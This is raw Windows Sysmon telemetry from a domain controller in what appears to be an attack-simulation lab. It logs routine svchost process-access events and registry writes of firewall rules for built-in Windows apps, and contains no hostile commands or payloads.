13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|M=microsoft.windows.apprep.chxapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{214AED19-B7BB-4A10-8860-2E7C09DD5617}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{20EF51FF-1BD9-4275-AF88-73987641A7E7}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7F5FB9CD-6099-49A3-8DC2-7E02EADE500D}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6A9C39BA-CF0A-427B-9A02-D15C926B4082}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|M=microsoft.lockapp_cw5n1h2txyewy|Name=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\|PFN=Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{6AA62998-79C1-4573-AAB4-78A2D41C8E99}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C40AC3AD-3CEF-4605-B027-B74F4DB2A97D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{2B36EAC9-2AEC-4923-B983-44C46180AC09}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C3B39615-6835-4F44-8B40-336147DFBBD3}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 10341000x800000000000000010861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 